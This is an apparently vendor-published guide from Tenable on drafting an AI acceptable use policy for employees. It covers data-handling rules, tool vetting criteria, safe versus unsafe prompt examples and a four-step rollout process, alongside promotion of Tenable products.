What is an AI acceptable use policy (AUP)?
Last updated | October 29, 2025 |
Protect your organization from unsanctioned AI
An AI acceptable use policy is a crucial set of rules that governs and guides employee use of generative AI tools and agents to help your organization balance innovation with protecting sensitive company data.
要点
- An AI acceptable use policy is key to managing the cyber exposure created by unmanaged or "shadow" AI tools.
- Key policy elements must include scope, clear data handling rules, and a curated list of authorized tools.
- Integrating security for AI principles from frameworks like the OWASP Top 10 for Large Language Model (LLM) Applications and OWASP Agentic AI Governance is critical for a robust policy.
- A clear governance process for vetting and approving new AI tools prevents future security gaps.
Expose key concepts
- Why every organization needs an AI acceptable use policy — now
- 5 essential elements of a generative AI policy
- Safe usage in practice: Examples and scenarios
- Integrating security for AI into your policy
- How to create your AI AUP: A 4-step guide
- Making the case for an AI AUP to leadership
- Frequently asked AI AUP questions
- Getting started with your AI AUP
- AI AUP resources
- AI AUP products
Why every organization needs an AI acceptable use policy — now
An AI acceptable use policy (AI AUP) is a formal set of rules that defines how employees can use generative artificial intelligence tools (AI) and services.
As your teams explore AI platforms like ChatGPT and others to boost creativity and efficiency, they can also unintentionally create new risks. Without clear guidelines, employees might input sensitive intellectual property, customer data, or internal credentials into public AI models and create significant cyber exposure for your organization.
An effective policy for acceptable AI use creates guardrails for your organization to innovate safely. It establishes clear do's and don'ts, protects company assets, and creates a formal process for vetting new technologies. An AI user policy defines permitted and prohibited uses, clearly outlines required data-handling safeguards and who may access which tools, as well as the approval and onboarding process for new AI technologies.
A strong AI user policy is a foundational part of your overall cybersecurity strategy. It’s also the starting point for securing AI across your enterprise.
See how the Tenable One Exposure Management Platform can help you manage your full AI exposure and risks.
5 essential elements of a generative AI policy
A strong AI use policy is clear, comprehensive and easy for everyone to understand. It replaces ambiguity with well-defined rules that protect your employees and your organization. While you can tailor your policy to your specific industry and risk appetite, you should build your generative AI acceptable use policy based on these five essential pillars.
1.Scope and roles
This section defines who and what the policy covers. It should clearly state which employees, departments, and business environments must adhere to the rules. It also assigns responsibility, outlining the duties of employees, managers, and the AI governance team (e.g., CIO, legal, InfoSec) to ensure accountability. Clarifying scope and roles is a key part of any AI policy for employees.
2. Authorized tools and prohibited use cases
You should maintain a curated list of approved AI tools and agents that your security and legal teams have vetted. This section should also include concrete examples of forbidden activities, such as using unapproved AI platforms or using AI for activities that are illegal, unethical, or violate company standards.
3. Data handling and privacy rules
Data handling and privacy rules are among the most critical components of your AI AUP. You must explicitly define which types of data employees must never input into public AI tools, including personally identifiable information (PII), protected health information (PHI), intellectual property, source code, and corporate financial data. Provide clear guidance on when and how to use data masking or anonymization techniques.
4. The governance and change process
Your employee use policy for AI should evolve as quickly as AI technologies do. This section details the workflow for how employees can request a new AI tool for review and authorization. It should also outline the decision criteria your governance team will use to approve or reject a tool, such as its data security protocols, privacy policy, vendor stability, and data residency.
Key vetting criteria for new AI tools
- Security protocols
- Review the vendor’s security posture.
- Do they have certifications like SOC 2?
- How do they encrypt data in transit and at rest?
- What are their vulnerability management and incident response processes?
- Data privacy policy
- Understand how the vendor handles your data.
- Does their policy explicitly state how they support compliance with regulations relevant to your business, such as HIPAA, PCI DSS, etc.?
- Critically, does the vendor use customer prompts and inputs to train its models?
- Can you opt out?
- What are the vendor’s data retention policies?
- Vendor stability
- The AI market is volatile. Ask your team, what’s the business risk of relying on an unvetted new AI tool?
- Consider the vendor’s funding, market reputation, and long-term viability before integrating it into critical workflows.
- Data residency
- Know where the vendor stores and processes your data geographically, which is essential for complying with regulations like GDPR and CCPA.
- Ensure the vendor’s data centers are in regions that meet your compliance requirements.
5. Safe use
Finally, the policy should focus on key principles of safe AI use and serve as a bridge to practical, day-to-day examples instead of risky prompts. It reinforces the core message that employees should always verify that AI-generated content is accurate and that each team member is ultimately responsible for their work.
Safe usage in practice: Examples and scenarios
A policy is only effective if your employees can apply it to their daily work. To make the rules clear, provide concrete examples that illustrate safe versus unsafe AI prompting behavior. Doing so translates abstract principles like "protect company data" into actionable guidance for different roles across your organization.
A quick checklist of AI use do's and don'ts
Use this checklist as a starting point for employee training and internal communications:
- DO verify the accuracy of all AI-generated content before using it.
- DO use approved, company-vetted AI tools for all work-related tasks.
- DO anonymize any business data you use in prompts whenever possible.
- DON'T input any customer PII, employee data, or confidential company intellectual property into public AI tools.
- DON'T use AI to create content that is harassing, discriminatory, or violates company policy.
- DON'T present AI-generated content as your own original work without proper review and modification.
Role-based examples: Safe vs. unsafe prompts
AI Tool choice vs. prompt safety
The examples below demonstrate how to write safe prompts for public or general-use AI tools. However, the most important solution for highly sensitive data (like source code, non-public financials, or PII) is not just prompt safety, but a data exposure risk.
Your employees should never enter proprietary data into a public AI tool.
For this type of data, you must use a company-approved, secure solution. For example, an internal LLM (e.g., a self-hosted model) or a secure enterprise platform (like ChatGPT Enterprise) that explicitly guarantees it does not use your data for training and is not accessible outside of your organization's instance.
- Scenario for marketing
- Unsafe prompt: "Analyze this attached list of our top 100 customer email addresses and sales data from Q3 to identify new marketing campaign ideas."
- Safe prompt: "Our company sells cybersecurity software to IT managers in the financial services industry. Based on public information, suggest three marketing campaign ideas that would appeal to this audience."
- Scenario for HR
- Unsafe prompt: "Review this attached resume from Jane Doe and her performance review data to write a job description for a similar role."
- Safe prompt: "Write a job description for a senior software engineer. The role requires five years of experience with Java, cloud security knowledge, and strong communication skills. The position is remote."
Integrating security for AI into your policy
A comprehensive acceptable use policy for AI governs user behavior, but it's only one half of the equation.
Your policy should also connect to your broader strategy for security for AI: the technical measures you use to protect the AI models and infrastructure themselves.
This approach ensures you are holistically managing human-based and technology-based risks. By referencing technical security standards within your policy, you align your entire organization around a common set of goals for secure AI adoption.
Addressing the top AI security risks
Your acceptable use policy for AI should acknowledge the underlying technical vulnerabilities inherent in AI systems.
The OWASP Top 10 for LLMs is an excellent framework for understanding these current threats. Yet, as AI evolves from simple models to autonomous "agentic" systems (or AI agents), the new OWASP Agentic AI Security project is becoming the critical standard for future risks.
Risks like prompt injection, data leakage, and insecure output handling can expose your organization to attacks, even if employees follow the rules. Your policy should state your organization must vet all new tools against these known and emerging AI security risks.
Effectively managing these risks requires visibility into how your organization uses AI and where it creates potential exposures. Solutions like Tenable AI Exposure can help you discover and assess the use of AI systems across your environment, so you have insight to enforce your AI use policy and secure your infrastructure.
How to create your AI AUP: A 4-step guide
Putting your AI use policy into practice requires a cross-functional effort to ensure the rules are practical, well-understood, and have consistent enforcement.
Follow this four-step process to build and implement an effective acceptable AI use policy for your organization.
第 1 步:Assemble your AI governance team
First, identify the key stakeholders who will own your AI acceptable use policy. This team is typically a partnership between IT/security, legal, HR, and representatives from key business units.
This group will be responsible for drafting the policy, vetting new tools, and handling exceptions.
Designating a clear point of contact is crucial for employees who have questions or need to submit a new tool for review.
第 2 步:Draft the AI policy using this guide
Using the essential elements outlined above, draft an initial version of your AI use policy. The goal is to be clear and direct and avoid overly technical jargon that might confuse non-technical employees.
Avoiding the too-technical stuff is good guidance on how to write an AI policy that people will actually read. Focus on providing actionable guidance helps your teams make smart decisions while using AI.
第 3 步: Establish the new AI tool request process
Define and document the formal process for how an employee can request a new AI tool. This workflow should clearly state what information your review team needs for a submission (e.g., the tool’s purpose, its vendor, and a link to its security and privacy policies) and what the service-level agreement (SLA) is to get a decision from the governance team.
For example, your process could involve:
- Submit a ticket through your standard IT service portal with a special "AI Tool Review" category.
- Fill out a standardized form on your intranet that captures all the required information for the governance team.
- Send an email to a dedicated alias, such as [email protected].
第 4 步:Communicate and educate your employees
Once you’ve finalized your policy, get it in front of everyone. Conduct training sessions, post it where people actually look (not just buried somewhere in an intranet folder), and get your employees to sign your AI use policy acknowledgments. The real trick is keeping it relevant and engaging.
Want to dive deeper into AI security? Check out the Tenable blog.
Making the case for an AI AUP to leadership
Securing executive sponsorship is critical because it gives your AI use policy authority and ensures enforcement is a business-wide priority. You should frame the AI policy as a strategic enabler, not a restriction.
A clear employee policy for AI use accelerates safe AI adoption by replacing uncertainty with a clear framework for action. It removes employee guesswork for an approved pathway to innovate productively and with confidence.
A well-defined AI AUP directly reduces risk by:
- Preventing intellectual property leaks into public models
- Establishing clear accountability
- Ensuring full vetting of AI tools for security and privacy threats before your employees widely use them.
Gaining full visibility is the first step.
The Tenable One Exposure Management Platform gives your organization a unified view of your entire attack surface, including risks from new technologies like AI.
Enforcing your policy starts with knowing what's in your environment. Tenable helps you discover these shadow AI tools and agents. Products like Tenable AI Aware include plugins that detect the presence of popular AI and LLM tools, so you get visibility to apply your policy.
Tenable Research team also actively discovers and discloses exposures in third-party AI software to help secure your entire ecosystem.
Frequently asked AI AUP questions
There are a lot of unanswered questions out there about AI, especially around acceptable use policies. We've compiled some of the most frequently asked questions for you, aiming to answer them with clarity so you can establish your own.
1.What is the purpose of an AI acceptable use policy?
The main purpose of an AI acceptable use policy is to mitigate security and data privacy risks. It prevents employees from inputting confidential company data, intellectual property, or customer PII into public AI models to decrease your organization's exposure to data loss.
2. Who is responsible for creating an AI acceptable use policy?
Creating an AI use policy is typically a collaborative effort led by a governance team that includes representatives from IT/security, legal, and human resources, with input from key business departments.
3. How is an AI acceptable use policy different from a general IT acceptable use policy?
While a general IT policy covers broad technology use (email, internet, software), an AI-specific policy addresses the unique risks of generative AI, such as data privacy concerns with prompt inputs, intellectual property leakage, and the generation of inaccurate or biased information.
Getting started with your AI AUP
A comprehensive AI acceptable use policy helps your organization move fast with AI adoption without breaking things. It gives your teams the guardrails they need to experiment safely, keeps your crown jewels safe, and sets up an AI governance framework that'll actually scale.
You can use the framework and checklist in this guide as core components to create your own AI acceptable use policy template. Include, for example:
- Policy scope and responsibilities - Clearly defines who and what the AI use policy covers and assigns accountability.
- Approved AI tools and use restrictions - Lists all company-vetted AI technologies and outlines ways your employees should and should not use AI.
- Data protection and privacy standards - Creates clear rules that explain how to handle sensitive and confidential information.
- Guidelines for safe and responsible use - Offers practical advice and examples for day-to-day interactions with AI.
- Governance and new tool vetting process - Outlines the formal procedure for reviewing and approving new AI applications.
By turning these guidelines into policy and consistent practice, you transform your AI risks into business enablers that are a core part of your security culture.
AI AUP resources
AI AUP products
您可加以利用的网络安全新闻
- Tenable AI Exposure
- Tenable One